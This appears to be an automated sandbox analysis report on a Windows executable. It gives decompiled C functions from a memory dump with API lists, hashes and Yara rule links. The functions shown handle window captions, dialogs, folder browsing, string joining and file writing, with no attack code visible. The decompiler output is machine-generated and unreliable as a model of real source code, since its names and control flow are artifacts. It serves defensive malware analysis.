                                                                                                        • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                        • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                        • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 77%
                                                                                                        			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                        0x00405e0a
                                                                                                        0x00405e12
                                                                                                        0x00405e18
                                                                                                        0x00405e1c
                                                                                                        0x00405e1e
                                                                                                        0x00405e1e
                                                                                                        0x00405e24
                                                                                                        0x00405e2c
                                                                                                        0x00405e2e
                                                                                                        0x00405e44
                                                                                                        0x00405e49
                                                                                                        0x00405e4c
                                                                                                        0x00405e4d
                                                                                                        0x00405e68
                                                                                                        0x00405e74
                                                                                                        0x00405e74
                                                                                                        0x00000000
                                                                                                        0x00405e84
                                                                                                        0x00405e8c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 1523050162-4135340389
                                                                                                        • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                        • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                        • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                        • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                        0x00409a4a
                                                                                                        0x00409a4f
                                                                                                        0x00409a56
                                                                                                        0x00409a5e
                                                                                                        0x00409a60
                                                                                                        0x00409a6e
                                                                                                        0x00409a6e
                                                                                                        0x00409a60
                                                                                                        0x00409a71
                                                                                                        0x00409a76
                                                                                                        0x00000000
                                                                                                        0x00409a78
                                                                                                        0x00000000
                                                                                                        0x00409a89

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                        • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                        • API String ID: 946536540-379566740
                                                                                                        • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                        • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                        • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                        • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                        0x0040588e
                                                                                                        0x0040588f
                                                                                                        0x0040588f
                                                                                                        0x00405892
                                                                                                        0x00405896
                                                                                                        0x004058a9
                                                                                                        0x004058a9
                                                                                                        0x004058ad
                                                                                                        0x004058af
                                                                                                        0x004058b5
                                                                                                        0x004058b6
                                                                                                        0x004058b9
                                                                                                        0x004058c2
                                                                                                        0x004058c3
                                                                                                        0x004058c8
                                                                                                        0x004058d2
                                                                                                        0x004058d4
                                                                                                        0x004058d9
                                                                                                        0x004058e0
                                                                                                        0x004058ea
                                                                                                        0x004058ec
                                                                                                        0x004058ed
                                                                                                        0x004058f2
                                                                                                        0x004058f9
                                                                                                        0x00405902
                                                                                                        0x00405898
                                                                                                        0x00405898
                                                                                                        0x0040589a
                                                                                                        0x0040589c
                                                                                                        0x004058a1
                                                                                                        0x004058a2
                                                                                                        0x004058a5
                                                                                                        0x004058a7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058a7
                                                                                                        0x00405912
                                                                                                        0x00405915
                                                                                                        0x0040591e
                                                                                                        0x0040591e
                                                                                                        0x00405907
                                                                                                        0x0040590b

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1865533344-0
                                                                                                        • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                        • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                        • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                        • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                        0x0040ad06
                                                                                                        0x0040ad0a
                                                                                                        0x0040ad0c
                                                                                                        0x0040ad14
                                                                                                        0x0040ad19
                                                                                                        0x0040ad1f
                                                                                                        0x0040ad23
                                                                                                        0x0040ad27
                                                                                                        0x0040ad2a
                                                                                                        0x0040ad2d
                                                                                                        0x0040ad34
                                                                                                        0x0040ad3b
                                                                                                        0x0040ad3e
                                                                                                        0x0040ad44
                                                                                                        0x0040ad48
                                                                                                        0x0040ad4a
                                                                                                        0x0040ad52
                                                                                                        0x0040ad5a
                                                                                                        0x0040ad64
                                                                                                        0x0040ad65
                                                                                                        0x0040ad6b
                                                                                                        0x0040ad6c
                                                                                                        0x0040ad73
                                                                                                        0x0040ad76
                                                                                                        0x0040ad7c
                                                                                                        0x0040ad7c
                                                                                                        0x0040ad7f
                                                                                                        0x0040ad84

                                                                                                        APIs
                                                                                                        • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                        • wcscpy.MSVCRT ref: 0040AD65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3917621476-0
                                                                                                        • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                        • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                        • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                        • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                        0x00404a62
                                                                                                        0x00404a6a
                                                                                                        0x00404a6e
                                                                                                        0x00404a71
                                                                                                        0x00404a74
                                                                                                        0x00404a92
                                                                                                        0x00404a92
                                                                                                        0x00404a76
                                                                                                        0x00404a76
                                                                                                        0x00404a87
                                                                                                        0x00404a90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a90
                                                                                                        0x00404aa3
                                                                                                        0x00404aa7
                                                                                                        0x00404aa7
                                                                                                        0x00404a94
                                                                                                        0x00404a98

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 00404A52
                                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 3888421826-0
                                                                                                        • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                        • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                        • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                        • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                        0x004072e0
                                                                                                        0x004072f7
                                                                                                        0x004072fd
                                                                                                        0x00407316
                                                                                                        0x00407342

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004072FD
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                        • strlen.MSVCRT ref: 00407328
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2754987064-0
                                                                                                        • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                        • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                        • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                        • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                        0x00408dd0
                                                                                                        0x00408dd2
                                                                                                        0x00408de2
                                                                                                        0x00408df4
                                                                                                        0x00408e01
                                                                                                        0x00408e1b
                                                                                                        0x00408e21
                                                                                                        0x00408e28
                                                                                                        0x00408e30
                                                                                                        0x00408dd4
                                                                                                        0x00408dd8
                                                                                                        0x00408dd8

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 1386444988-0
                                                                                                        • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                        • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                        • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                        • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                        0x004050e1
                                                                                                        0x004050ec
                                                                                                        0x004050ee
                                                                                                        0x004050f5
                                                                                                        0x004050ff
                                                                                                        0x00405114
                                                                                                        0x00405118
                                                                                                        0x00405123
                                                                                                        0x00405128
                                                                                                        0x00405101
                                                                                                        0x00405109
                                                                                                        0x0040510f
                                                                                                        0x0040512e

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcslen$wcscatwcsncat
                                                                                                        • String ID:
                                                                                                        • API String ID: 291873006-0
                                                                                                        • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                        • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                        • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                        • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                        0x00402de0
                                                                                                        0x00402de2
                                                                                                        0x00402dec
                                                                                                        0x00402def
                                                                                                        0x00402dfb
                                                                                                        0x00402e0c
                                                                                                        0x00402e0e
                                                                                                        0x00402e0e
                                                                                                        0x00402e16
                                                                                                        0x00402e18
                                                                                                        0x00402e1a
                                                                                                        0x00402e21

                                                                                                        APIs
                                                                                                        • GetClientRect.USER32 ref: 00402DEF
                                                                                                        • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                        • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                          • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                          • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4235085887-0
                                                                                                        • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                        • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                        • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                        • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 72%
                                                                                                        			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                        0x0040b6a6
                                                                                                        0x0040b6ad
                                                                                                        0x0040b6af
                                                                                                        0x0040b6b0
                                                                                                        0x0040b6b5
                                                                                                        0x0040b6b6
                                                                                                        0x0040b6bd
                                                                                                        0x0040b6bf
                                                                                                        0x0040b6c0
                                                                                                        0x0040b6c5
                                                                                                        0x0040b6c6
                                                                                                        0x0040b6cd
                                                                                                        0x0040b6cf
                                                                                                        0x0040b6d0
                                                                                                        0x0040b6d5
                                                                                                        0x0040b6d6
                                                                                                        0x0040b6dd
                                                                                                        0x0040b6df
                                                                                                        0x0040b6e0
                                                                                                        0x00000000
                                                                                                        0x0040b6e5
                                                                                                        0x0040b6e6

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                        • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                        • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                        • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

